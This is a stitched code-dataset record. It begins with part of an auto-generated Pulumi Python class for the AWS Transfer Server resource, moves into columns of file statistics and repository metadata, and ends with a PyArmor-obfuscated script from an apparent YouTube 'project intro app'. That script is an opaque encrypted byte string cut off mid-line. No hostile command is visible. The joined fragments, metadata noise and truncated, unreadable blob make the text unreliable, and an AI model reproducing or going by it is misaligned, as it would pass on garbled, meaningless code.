Certain resource arguments, such as `host_key`, cannot be read via the API and imported into the provider. This provider will display a difference for these arguments the first run after import if declared in the provider configuration for an imported resource.
:param str resource_name: The name of the resource.
:param ServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServerArgs.__new__(ServerArgs)
__props__.__dict__["certificate"] = certificate
__props__.__dict__["directory_id"] = directory_id
__props__.__dict__["domain"] = domain
__props__.__dict__["endpoint_details"] = endpoint_details
__props__.__dict__["endpoint_type"] = endpoint_type
__props__.__dict__["force_destroy"] = force_destroy
__props__.__dict__["function"] = function
__props__.__dict__["host_key"] = host_key
__props__.__dict__["identity_provider_type"] = identity_provider_type
__props__.__dict__["invocation_role"] = invocation_role
__props__.__dict__["logging_role"] = logging_role
__props__.__dict__["protocols"] = protocols
__props__.__dict__["security_policy_name"] = security_policy_name
__props__.__dict__["tags"] = tags
__props__.__dict__["url"] = url
__props__.__dict__["arn"] = None
__props__.__dict__["endpoint"] = None
__props__.__dict__["host_key_fingerprint"] = None
__props__.__dict__["tags_all"] = None
super(Server, __self__).__init__(
'aws:transfer/server:Server',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
host_key_fingerprint: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None) -> 'Server':
"""
Get an existing Server resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Transfer Server
:param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
:param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
:param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
:param pulumi.Input[str] endpoint: The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
:param pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
:param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
:param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
:param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
:param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
:param pulumi.Input[str] host_key_fingerprint: This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
:param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
:param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
:param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
:param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
:param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServerState.__new__(_ServerState)
__props__.__dict__["arn"] = arn
__props__.__dict__["certificate"] = certificate
__props__.__dict__["directory_id"] = directory_id
__props__.__dict__["domain"] = domain
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["endpoint_details"] = endpoint_details
__props__.__dict__["endpoint_type"] = endpoint_type
__props__.__dict__["force_destroy"] = force_destroy
__props__.__dict__["function"] = function
__props__.__dict__["host_key"] = host_key
__props__.__dict__["host_key_fingerprint"] = host_key_fingerprint
__props__.__dict__["identity_provider_type"] = identity_provider_type
__props__.__dict__["invocation_role"] = invocation_role
__props__.__dict__["logging_role"] = logging_role
__props__.__dict__["protocols"] = protocols
__props__.__dict__["security_policy_name"] = security_policy_name
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["url"] = url
return Server(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of Transfer Server
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def certificate(self) -> pulumi.Output[Optional[str]]:
"""
The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
"""
return pulumi.get(self, "certificate")
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> pulumi.Output[Optional[str]]:
"""
The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
"""
return pulumi.get(self, "directory_id")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[Optional[str]]:
"""
The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="endpointDetails")
def endpoint_details(self) -> pulumi.Output[Optional['outputs.ServerEndpointDetails']]:
"""
The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
"""
return pulumi.get(self, "endpoint_details")
@property
@pulumi.getter(name="endpointType")
def endpoint_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
"""
return pulumi.get(self, "endpoint_type")
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
"""
return pulumi.get(self, "force_destroy")
@property
@pulumi.getter
def function(self) -> pulumi.Output[Optional[str]]:
"""
The ARN for a lambda function to use for the Identity provider.
"""
return pulumi.get(self, "function")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> pulumi.Output[Optional[str]]:
"""
RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyFingerprint")
def host_key_fingerprint(self) -> pulumi.Output[str]:
"""
This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
"""
return pulumi.get(self, "host_key_fingerprint")
@property
@pulumi.getter(name="identityProviderType")
def identity_provider_type(self) -> pulumi.Output[Optional[str]]:
"""
The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
"""
return pulumi.get(self, "identity_provider_type")
@property
@pulumi.getter(name="invocationRole")
def invocation_role(self) -> pulumi.Output[Optional[str]]:
"""
Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "invocation_role")
@property
@pulumi.getter(name="loggingRole")
def logging_role(self) -> pulumi.Output[Optional[str]]:
"""
Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
"""
return pulumi.get(self, "logging_role")
@property
@pulumi.getter
def protocols(self) -> pulumi.Output[Sequence[str]]:
"""
Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
"""
return pulumi.get(self, "protocols")
@property
@pulumi.getter(name="securityPolicyName")
def security_policy_name(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
"""
return pulumi.get(self, "security_policy_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter
def url(self) -> pulumi.Output[Optional[str]]:
"""
- URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
return pulumi.get(self, "url")
| 56.604672
| 772
| 0.67837
| 7,999
| 63,001
| 5.189649
| 0.04388
| 0.067571
| 0.065764
| 0.058826
| 0.954519
| 0.947509
| 0.935609
| 0.929779
| 0.927852
| 0.91641
| 0
| 0.005309
| 0.225679
| 63,001
| 1,112
| 773
| 56.655576
| 0.845643
| 0.513024
| 0
| 0.83452
| 1
| 0
| 0.096505
| 0.017401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16726
| false
| 0.001779
| 0.012456
| 0
| 0.281139
| 0.02669
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a32df01424bf6a52065b09ddeaffc87b09f9a20
| 8,671
|
py
|
Python
|
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x0a\x00\x6f\x0d\x0d\x0a\x09\x2f\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x1f\x08\x00\x00\x00\x00\x00\x08\x6a\xbc\x04\xbc\xda\x41\xd3\xfe\x30\x7f\x70\x02\xb1\x58\xc8\x2b\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xa8\xb3\xe7\x3b\x67\x33\x9c\x03\x4d\x0d\x66\x1a\x56\x3c\xe9\xac\x0c\x29\x45\xc2\x8b\x94\x34\xe8\x0f\xaf\xfc\xae\x11\xe7\xe9\x80\xd1\x3f\x63\xbf\x6f\x0e\xe6\xd1\x87\xa5\x68\xd0\x9f\x01\x80\x44\x4e\x49\x45\xc8\x49\x39\x8c\xf8\x25\xe3\x88\x33\x05\xd6\xfd\xe0\x4e\x62\xc5\xd3\xbc\x68\x82\x8b\xd8\x18\x19\x09\x01\x49\x84\x31\x6e\x37\x7c\xf3\x96\x8f\xf3\xf8\x5b\xab\x52\xd5\x4b\xf9\xa4\x63\xea\x52\x43\x9c\x55\x42\xe7\x17\xf4\xfd\x70\xd7\x20\x53\x1a\x8c\xb9\x03\x2b\x5a\xa8\x3c\x75\x18\x89\xff\xd7\x8b\xef\x81\x23\x1d\x7c\x5a\xec\x15\x89\x67\xd5\x55\x74\x71\xd6\x18\xea\xd5\x2c\x65\xea\x47\x05\xe8\x27\x49\x4b\x7e\x35\x0f\x30\x6a\x47\xc2\x7b\x09\xef\xae\x4d\x58\xcd\xff\x35\x0d\xf7\xb3\x71\x00\xad\x40\xa5\xc4\x5e\x2c\xdd\xa8\x7d\x50\xaa\xdd\x8d\xf6\xd5\x69\xfc\x80\x87\x03\x1a\xa4\x9b\x13\xa6\x0c\x52\x4a\xe6\x0c\xa2\x84\xe4\xaf\xea\x9a\x29\x8f\xb6\x47\xba\xa1\x76\x08\x24\x41\x13\x17\x93\xe4\xd9\x7d\xf9\x65\xb6\xdd\x86\x57\x1f\x2b\xf0\x19\xa8\xc4\xab\x32\x4d\x1b\x4f\x3a\x89\xb1\xa1\x08\xc9\xe7\xd1\x39\x3c\xe9\xb8\x8d\x76\x07\x5d\xc0\x5f\x8a\x2f\xd5\xc9\x45\xf2\xc5\x8c\x75\x4c\x95\x8f\xe2\x46\xec\xb8\x7b\x24\xa8\x9a\x54\xd2\xab\x8c\xd1\x6d\x7e\x2f\x56\x83\x69\x5c\xde\xab\x13\xdc\x05\xbe\xbd\x5b\x8b\x32\xe6\xd2\xad\x60\xd7\xe9\xb9\xe2\x3c\xa7\x1e\xaa\x0c\x42\xf3\x6b\x4b\x46\x34\x4e\xa8\x88\x0a\x2a\x3a\xbd\x13\x6a\xa4\xa8\x80\x82\x47\x76\xf0\xa4\x3f\x57\x37\xd8\x02\xc7\xb5\x89\x13\xf6\x0f\x55\xa3\xb4\x3a\x31\x62\x63\xf8\x49\xb5\x6c\x72\x5f\x27\x87\x85\x21\x46\x0e\xe5\xaa\x3c\x9d\x4d\x22\x10\x77\x48\xec\x5e\x26\xb2\xb9\x51\xfe\x45\x1c\x50\xde\xb8\x7c\xa4\xc8\xde\x13\xf8\x6a\x17\xd7\x7c\x39\x44\x9d\xe3\xec\x98\xe6\xa9\x25\x9a\x44\x96\xd7\x21\x4f\x8d\xfc\xc4\xc4\xa1\xb5\x01\x6b\x44\xc4\x0d\x8a\x05\x91\x37\xa0\x4b\x51\xb8\xea\x65\x59\xc9\x1c\x2a\xb0\xaf\x3b\xe5\x2a\xb3\x4b\x5b\xd5\x11\xb0\x9f\xf6\x6b\x8c\xed\x06\x7b\xe7\x8d\x88\xa4\x93\x14\xe9\x4d\x12\x84\x61\x95\x8f\x24\xff\xfc\xec\x6d\x26\xe2\x10\x26\xb0\x4d\xab\x23\xc2\x95\x6a\xac\xf4\xe9\x16\xfe\x2f\x05\xcd\xb7\x30\x0f\xed\x4a\xf5\x1c\x62\x3a\xbd\xc2\x9d\xac\xb1\xaf\xa5\x60\xe7\xa2\x23\xd6\x10\xd2\x30\x59\xf2\x4f\xa8\xb6\xfd\x02\xd9\x7a\xc3\x98\x84\xfb\xbb\x63\x1c\x8d\x51\x61\x77\xfb\x73\x05\xff\xbd\x6c\x49\xd8\xde\x51\x02\xaf\xee\xcb\xbd\xea\xbb\xfc\x96\x03\x91\x3f\xb7\x07\x04\x7b\x83\xea\x78\x87\xe1\xe5\xa4\x2e\xe5\x85\x94\xe6\x6e\x61\xb7\x4e\xa1\x5c\xe2\x62\x12\x0f\xd1\x49\xff\x19\xe9\x96\xdb\xb1\x2c\x32\x48\xee\xa6\x61\x1c\xd0\x2d\x68\x66\x80\x4a\xf5\x87\x6a\x62\x1e\xc3\xe2\x04\xb8\x9d\x29\x61\x90\xff\xf6\x9d\xd3\x9a\xf5\x9c\xce\x9d\xcf\x8e\xb4\xd7\x6f\x44\xc2\x95\x2f\x20\x07\x70\x4c\x18\x6e\xa2\x0e\x6e\xb5\x5a\x50\x28\x3b\xb4\x3f\x92\x2d\xde\x4f\xaa\x58\x57\x74\x53\xaf\x00\x39\x51\xbb\xc5\x20\xff\x9c\x62\xb5\x9d\x36\x13\xac\x26\x36\xeb\x77\xd1\xc3\xa2\xd5\x85\xd7\xd3\xf9\x5c\x85\x1e\x8e\x25\x70\x37\x6d\x65\x2c\x75\x29\x4b\x1a\x1a\xe7\x12\x4e\x67\x23\xe0\xe2\x50\xb5\x86\x52\x91\x8a\x97\x79\x95\xdb\x28\x0f\xad\x49\xe6\x50\x60\x4f\xad\x1e\xdd\x71\x8b\x8f\x32\xd7\x91\x96\x03\x9e\xec\xe6\xd5\x56\x1f\x67\xc8\x1b\x0c\x28\x4b\x96\xef\x48\x04\xf9\x0f\x73\x25\x8a\x08\xc1\x71\xde\xa8\x85\xf6\xd8\xb8\xa4\xdf\x56\xf2\xe8\xb0\x32\xbd\xfb\x02\x82\x79\x00\x07\x94\x8a\xcb\x3d\x54\x19\x75\x38\xb1\x27\xe6\xc5\xea\xf5\xce\xee\x6d\xf3\x3f\x76\xc7\xd1\xff\xf8\xa4\xe0\x2e\xcc\x8d\x39\x5c\xab\xe7\xe9\x39\x55\x34\x30\xed\x51\xa1\x87\xd8\xca\x98\xca\xa4\xd8\x15\x04\x0a\x2b\x5b\x23\xc3\xe0\xb8\x5a\x7f\x9c\x90\x97\xf4\x1d\xb4\xfb\x24\xaa\x65\x92\x31\xd7\x2e\x36\x32\x40\x60\x2e\xbc\xd8\x4a\xe7\x55\xdd\xcc\x80\x0c\x21\x64\xa8\x6a\xfc\x68\x13\xc0\xa5\x1f\xd9\x25\xf9\x0a\x6e\xa6\x91\x19\xc1\x29\xea\xbe\xeb\x48\xb1\x8f\x42\xf0\x78\xba\x1c\x45\x7c\x9a\x8f\x41\x31\x55\x89\x15\x5d\xd5\xac\x37\xb0\x3a\xb9\xf4\x5d\x99\x80\x8e\x4b\xfa\xce\x35\xff\x51\x9f\x56\x57\x5f\x07\xdc\x93\x17\xb9\xdc\xb6\x4b\x33\x9d\x4c\xa2\xcc\x34\x22\x78\x1b\x32\x9b\xc0\x4f\x9f\xa1\x61\xe0\x10\xb6\xb3\xfe\x54\x9e\xc2\xd2\xa0\x44\x83\x7b\xab\x91\x6c\xdd\xba\x32\x53\x4a\x9a\x14\xde\xa8\xfe\x39\x96\xd8\x51\x03\x6f\x5e\xe6\x3f\xf5\x36\x12\x01\x5f\xdc\x78\x71\x73\x14\xbf\x84\xbb\x16\xfb\xd6\x07\x35\xc2\x2a\xac\xe2\xa9\xc5\x1e\xf3\xd6\x8e\x7b\x86\xed\x8f\xcc\x15\x90\x08\x42\x0b\xab\x16\xaf\x1d\x02\x86\xbe\x75\x3a\xf4\x15\xc1\x29\xcd\xba\x05\x43\x24\x36\x4b\x9f\x95\x28\x13\x86\x91\xca\x56\x8d\x80\x73\xc5\xa8\x5e\x63\xe4\x57\x33\x8f\x1e\xf1\x74\x02\x93\x55\xf9\x60\xab\x4a\xb9\x8e\xf1\x45\x26\x0b\x67\xdd\x2f\x11\xb7\x51\x46\xff\x90\xea\x5a\xba\x02\x66\x1c\x0b\xc5\xd9\xc0\x61\x92\x63\x94\xcd\x15\x08\x55\x40\xb3\x81\xcf\x4c\x16\x19\x20\xcc\x13\x22\x31\x20\xe6\xed\xea\xe7\x3b\x92\xdf\xcc\x36\xdd\xac\x9d\x29\x37\x68\xe4\x76\xcf\x26\x85\xb4\xb1\x15\x28\xa2\x23\x01\xe9\x78\xd6\xda\xbe\x8f\x10\xea\xf2\x62\xb7\x0b\xce\x6b\xbb\x34\xd1\x9a\x3d\x6b\xad\x73\xc1\x73\x86\x17\xb6\x26\xbe\x0c\x27\x1a\x91\xa5\xb5\xf0\x20\xf8\x76\xc6\xc7\x2d\x21\x80\x47\x94\x2a\xc2\x88\x71\x1b\x36\x2d\x76\x15\xde\x8d\x2c\x0e\x08\x51\x8d\x2c\x20\xc4\x65\x05\x37\x86\x22\x3b\x98\x57\xfd\xe2\x37\x26\x9f\x69\x37\x6c\xac\x3c\x48\xf2\x2d\x83\x1a\x3f\x72\xe4\x45\x5d\xe2\x97\x5d\xb4\x42\x79\x0d\xa2\x85\xd0\x55\x08\xf3\x6a\xd0\xb8\xac\x83\x0d\x30\x4c\x15\xea\x7b\x67\x85\xbf\xe2\x90\x8d\xf0\x10\x58\x4e\x99\xc5\xfb\x2f\x4d\x4a\x41\x83\x3f\xe3\xdf\x93\x85\xd6\x2f\x40\x3d\x6d\xb6\x32\x2b\x45\xc6\x37\x6a\x77\x60\xaa\xaf\x87\x84\xfd\x7c\x50\x97\xf0\x86\xbf\x39\x21\xc7\x94\x4f\x28\xd3\xe6\xf0\xb8\x1e\xe9\xc5\x9e\xc3\x39\x7c\xb3\x4d\x24\x6e\x99\x77\xbc\xf1\x69\x48\xe9\x3a\xba\xfa\x62\x69\xca\xbe\x09\x63\x8c\x9f\xc5\xff\xed\xfc\xc8\x95\x91\x4f\x8c\xbc\xe2\x7c\xd5\x3f\xa0\xc6\x2c\x80\x0f\x65\x95\x7e\xd9\x03\x82\xa9\xb1\x29\xf9\xb8\x5c\x26\xcb\x04\x6b\x2c\x3f\xdc\xec\xfa\xb0\x24\xf5\xef\xb5\x95\x6a\xf0\xeb\xf0\xc8\x95\x34\xd4\x4a\x9f\xde\xc4\x25\x7e\xd6\x16\xb1\xf1\x10\xd6\x19\x8a\x29\x83\xbb\xa4\xc9\x64\x18\xe6\xca\x7b\xce\x70\x38\x2e\xca\x0e\x8e\x28\x45\x22\x48\x2c\x5d\x58\xe6\xa9\x3a\xf8\x49\xca\xa3\x39\x9e\xb9\x02\xe1\xee\xde\xff\xd2\x32\xfc\x87\x64\xc2\x8e\x20\x0b\x3e\x48\xa1\xac\xfd\x28\xb0\x10\xe4\x98\x42\x6d\x8a\x99\xa6\x3c\x9b\xc7\xbc\x2a\x00\xc7\x64\x26\xcb\x61\x39\x52\x7e\x5c\xe4\x4c\x16\x11\x4f\x85\xda\xa2\x07\x4c\xa0\x99\x05\x51\x46\xdd\xf3\x13\xab\x16\x05\x68\xee\x08\x14\xf0\xd4\x97\xaf\xc7\x51\x78\x59\x38\xe1\x27\x42\x40\x1a\x3e\x22\xad\x8c\x34\x6e\x73\x10\x02\xac\x0c\x8b\xdf\xd6\xd5\x5c\xdb\xc8\x7e\x2e\x30\xcb\xee\x23\x4a\x68\xb7\x21\xad\x29\x2e\x59\x7c\xf9\x85\xd7\x62\xef\xee\xc8\xd2\xc0\xbc\x2c\xd5\x9d\x38\x6c\x39\x49\xa9\x2f\x2c\x35\xf6\x61\x14\x13\x62\x26\x1a\x2d\x8d\xfa\x9b\x36\xae\x24\xba\xc9\x28\x3c\x24\x52\x87\x7d\x62\x2e\x34\xdd\xd3\xc3\x95\x20\x96\xd4\x78\x97\x25\x63\xb9\x53\x00\xf5\x4a\x12\xb6\xd8\x8f\xad\x98\x9c\x7a\x1f\xc7\xf2\x63\xf4\x29\x3b\xfb\xca\x1d\x1a\x80\x87\xe0\x17\xe9\xb8\x32\x8d\x3b\x71\x72\xc2\x69\xba\x42\xec\xb8\x84\xf1\x56\xfb\x37\xfa\xf6\x5c\x76\x9e\x8b\x85\x4c\xeb\x03\xc6\x26\x9b\x2e\x37\xae\x93\x74\x68\xcd\x91\x30\x3e\x5f\x37\xd1\xa7\x76\x4c\xfd\x3c\xa5\xf7\xbe\xd2\xdb\x34\x35\x4c\x3c\x8c\x70\xe9\xec\x85\x9a\xe9\x4a\x9d\x43\xb2\x2a\xb9\xeb\xf5\xf4\xc4\xef\x9e\x4f\x28\x93\x00\x86\x0b\xfa\x26\x9a\xba\x69\x73\x54\x41\x10\xff\xba\x72\xe2\xe5\x3e\x6e\x5d\x99\x06\x2a\x0b\xc4\x26\xd3\x1d\x0b\x2d\x5c\x77\x9d\x03\x56\x8a\x84\x75\x39\xda\xb5\xe3\x9b\x1a\x24\xa0\xba\x4b\x6c\x92\xb9\x3e\x9d\x5f\x3e\x9e\xda\x4a\x16\x07\xaf\x08\x26\x04\x09\xe9\x0c\xec\x18\xed\xcc\xca\x90\xe3\xdc\x54\x1d\xd2\x9c\x4e\xe1\xf1\x07\x72\xc3\xbe\x35\xf6\x37\xb6\xa6\x66\x10\x3a\xbb\xb8\x9c\x0a\xf6\x66\x75\x4e\x7c\xaa\xbd\x1f\x52\x07\xf6\x11\xbd\x96\xb4\x34\x90\x6d\x06\x40\x68\x22\x3e\xb5\xdc\x32\xb7\x63\xc0\x7a\xd7\xd2\x5f\xe0\xf9\x56\x22\xcc\x08\xf1\x7c\xbf\x61\x4b\x66\xaa\x42\xfd\x0d\x48\xbf\x32\x52\x88\x99\x53\x0d\x4b\xf9\x29\x88\xd7\xe2\x2e\x42\x44\x60\x6f\x2f\x8b\x63\x94\x8e\xf2\x62\xb2\x82\xa9\xae\x22\xe7\x7b\x7a\x09\x74\x9d\x3c\xbd\xc1\xe9\xd9\x0d\x84\xa1\x10\x80\x63\x10\x84\x7a\x65\xed\x4c\x89\x0d\x4a\x3c\x93\x9e\xaa\x25\x1e\xc8\xe5\xb3\x67\x4b\x88\x9d\x7a\xa4\x5a\xac\x0c\xcf\x34\x1c\x82\x80\x17\xdd\x2e\x9f\x8c\x98\x5e\x21\x1e\xab\x60\x57\x38\x6e\x3f\x31\x28\x09\x14\x41\xe9\x3a\xde\xca\x4e\x6c\xdb\x0c\x8e\x8e\x3b\x58\x3e\x03\xea\x28\xb3\x25\x2c\x1e\x5b\x1d\x4d\x1d\x32\xfc\x83\xd2\xa6\x15\x76\x07\x65\x9c\x08\xe1\xcf\x7a\x65\x8c\x7d\x3d\x3f\xc3\x